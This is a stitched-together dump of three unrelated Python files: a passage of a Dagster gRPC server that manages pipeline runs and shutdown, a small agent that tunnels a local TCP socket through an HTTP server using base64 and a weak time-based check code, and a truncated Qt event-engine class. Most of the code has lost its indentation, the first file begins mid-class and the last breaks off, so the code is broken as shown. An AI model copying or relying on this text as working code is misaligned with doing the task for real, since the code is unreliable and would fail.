if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
sys.executable,
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
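    # A caller consuming one of these streams would typically collect the chunk
    # events in sequence order and concatenate their payloads before
    # deserializing. A minimal sketch (hypothetical helper, not part of this module):
    #
    #     def reassemble_chunks(chunk_events):
    #         ordered = sorted(chunk_events, key=lambda e: e.sequence_number)
    #         return "".join(e.serialized_chunk for e in ordered)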
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except DagsterUserCodeUnreachableError:
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
        if server_process.poll() is not None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
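# A minimal usage sketch (illustrative only, not part of this module): start a
# server process for a loadable target and talk to it through an ephemeral
# client. The LoadableTargetOrigin arguments below are hypothetical.
#
#     origin = LoadableTargetOrigin(python_file="repo.py", attribute="my_repo")
#     server = GrpcServerProcess(loadable_target_origin=origin)
#     with server.create_ephemeral_client() as client:
#         client.ping("hello")
#     server.wait()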
|
local_agent.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Email: chenwx716@139.com
# DateTime: 2018-11-22 16:24:44
__author__ = "chenwx"
import random
import time
import socket
import base64
import requests
import json
import hashlib
import threading
import os
import logging
import yaml
from pathlib import Path
streams = [None, None]
link_yes = None
debug = 1
sessice_id = None
crypt = True
class My_log(object):
"""docstring for My_log
日志服务的基类
"""
def __init__(self, log_file=None, level=logging.WARNING):
super(My_log, self).__init__()
self.logger = logging.getLogger()
if not self.logger.handlers:
log_dir = os.path.dirname(log_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
            self.logger.setLevel(level)
            handler = logging.FileHandler(log_file)
            formatter = logging.Formatter(
                "[%(asctime)s]:%(levelname)s:%(filename)s:%(funcName)s:%(lineno)d : %(message)s"
            )
            handler.setFormatter(formatter)
            self.logger.addHandler(handler)
def get_log(self):
return self.logger
def MyEncryption(signal, reqtype, sessice_id, data):
    # Placeholder: payload encryption is not implemented here; data is only
    # base64-encoded in req_http_server() when crypt is enabled.
    pass
def MyDecrypt(data):
    # Placeholder: payload decryption is not implemented here.
    pass
def create_key():
    time_value = int(time.time())
    return hashlib.sha1(
        str(((time_value * 6.9) + 34241258) * 2.4).encode("utf8")
    ).hexdigest()
def req_http_server(sessice_id, signal=2, data=None, resdata=None):
json_headers = {"content-type": "application/json"}
url = conf_data.get("http_server_url")
if not data:
data = b"1"
if crypt:
base64_data = base64.b64encode(data).decode()
value = {
"signal": signal,
"reqdata": {
"sessice_id": sessice_id,
"type": "tx1",
"data": base64_data,
"verifycode": create_key(),
},
}
# hashlib.sha1(base64_data.encode("utf8")).hexdigest()
else:
value = {
"signal": signal,
"reqdata": {
"sessice_id": sessice_id,
"type": "tx1",
"data": data,
"verifycode": 0,
},
}
try:
r = requests.post(url, data=json.dumps(value), headers=json_headers)
except Exception as e:
work_log.error("link remote http server error")
work_log.error(str(e))
raise e
if resdata:
# new_data = r.content
# new_data = r.text
base64_data = r.text
new_data = base64.b64decode(base64_data)
r.close()
# work_log.debug('sessice_id: %d , req_http_data: %s' % (sessice_id, str(new_data)))
work_log.debug(
"sessice_id: %d , req_http_data len: %d" % (sessice_id, len(new_data))
)
return new_data
else:
r.close()
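# Shape of the JSON envelope that req_http_server() posts to the remote HTTP
# server (a sketch derived from the code above; the values are illustrative):
#
#     {
#         "signal": 0,                 # 0: first data of a session, 1: more data,
#                                      # 2: poll for response data, 3: close session
#         "reqdata": {
#             "sessice_id": 123456,
#             "type": "tx1",
#             "data": "<base64-encoded bytes>",
#             "verifycode": "<time-based sha1 hex from create_key()>"
#         }
#     }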
def _remote_server():
global link_yes, sessice_id
while 1:
if not link_yes or not sessice_id:
time.sleep(1)
continue
try:
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, 2))
new_data = req_http_server(sessice_id, signal=2, data=None, resdata=True)
except Exception as e:
work_log.error("getmess error sleep 10s")
work_log.error(str(e))
time.sleep(10)
continue
if new_data:
work_log.debug("remote get mess data to s0 buff len: %d" % len(new_data))
            # s0 = _get_another_stream(0)  # get the stream object for the other side
s0 = streams[0]
if s0:
s0.sendall(new_data)
else:
work_log.info("remote get mess: recv data None")
# time.sleep(1)
s0 = streams[0]
if s0:
s0.close()
link_yes = None
work_log.info("_remote_server close _local_server connect")
continue
def _local_server():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_ip = conf_data.get("agent").get("listen_ip")
listen_port = conf_data.get("agent").get("listen_port")
server.bind((listen_ip, listen_port))
server.listen(1)
work_log.info("_local_server thread listen start")
while 1:
connection, client_addr = server.accept()
work_log.info("connect client addr: %s" % str(client_addr))
global link_yes, sessice_id
link_yes = True
sessice_id = random.randint(100000, 900000) + client_addr[1]
work_log.info("connect sessic_id: %d" % sessice_id)
        streams[0] = connection  # store the local-side stream object
signal = 0
try:
while 1:
work_log.debug(
"local server sessice_id: %d start recv data" % sessice_id
)
buff = connection.recv(4096)
# work_log.debug('sessice_id: %d ,buff data: %s' %(sessice_id,str(buff)))
work_log.debug(
"sessice_id: %d ,local server recv buff len: %d"
% (sessice_id, len(buff))
)
                if len(buff) == 0:  # the peer closed the connection, nothing left to read
work_log.info("sessice_id: %d ,buff == 0 ; break" % sessice_id)
req_http_server(sessice_id, signal=3, resdata=None)
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, 3))
break
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, signal))
req_http_server(sessice_id, data=buff, signal=signal, resdata=None)
signal = 1
except Exception as e:
work_log.error(
"sessice_id: %d one connect colsed; except error: %s"
% (sessice_id, str(e))
)
if not link_yes:
work_log.info(
"_local_server sessice_id: %d link_yes = None, continue, not close link"
% sessice_id
)
sessice_id = None
continue
else:
try:
connection.shutdown(socket.SHUT_RDWR)
connection.close()
streams[0] = None
link_yes = None
sessice_id = None
work_log.info("_local_server set link_yes = None, close link")
# req_http_server(sessice_id,data=None,signal=2,resdata=None)
except Exception as e:
work_log.error(
"sessice_id: %d shutdown socket error: %s" % (sessice_id, str(e))
)
sessice_id = None
work_log.debug("local server set sessid_id = None")
def main():
s1 = threading.Thread(target=_local_server)
s1.start()
s2 = threading.Thread(target=_remote_server)
s2.start()
s1.join()
s2.join()
if __name__ == "__main__":
workdir = Path(__file__).resolve().parent
global conf_data
    conf_data = yaml.safe_load(open(str(workdir / "devel.yaml"), "r").read())
logfile = workdir / conf_data.get("agent").get("log_file")
log_level = conf_data.get("agent").get("log_level")
work_log = My_log(logfile, log_level).get_log()
main()
|
eventEngine.py
|
# encoding: UTF-8
# Standard library modules
from __future__ import print_function
from queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# Third-party modules
from qtpy.QtCore import QTimer
# Modules developed in this project
from myquant.event.eventType import *
########################################################################
class EventEngine(object):
"""
事件驱动引擎
事件驱动引擎中所有的变量都设置为了私有,这是为了防止不小心
从外部修改了这些变量的值或状态,导致bug。
变量说明
__queue:私有变量,事件队列
__active:私有变量,事件引擎开关
__thread:私有变量,事件处理线程
__timer:私有变量,计时器
__handlers:私有变量,事件处理函数字典
方法说明
__run: 私有方法,事件处理线程连续运行用
__process: 私有方法,处理事件,调用注册在引擎中的监听函数
__onTimer:私有方法,计时器固定事件间隔触发后,向事件队列中存入计时器事件
start: 公共方法,启动引擎
stop:公共方法,停止引擎
register:公共方法,向引擎中注册监听函数
unregister:公共方法,向引擎中注销监听函数
put:公共方法,向事件队列中存入新的事件
事件监听函数必须定义为输入参数仅为一个event对象,即:
函数
def func(event)
...
对象方法
def method(self, event)
...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
self.__thread.setDaemon(True)
# 计时器,用于触发计时器事件
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
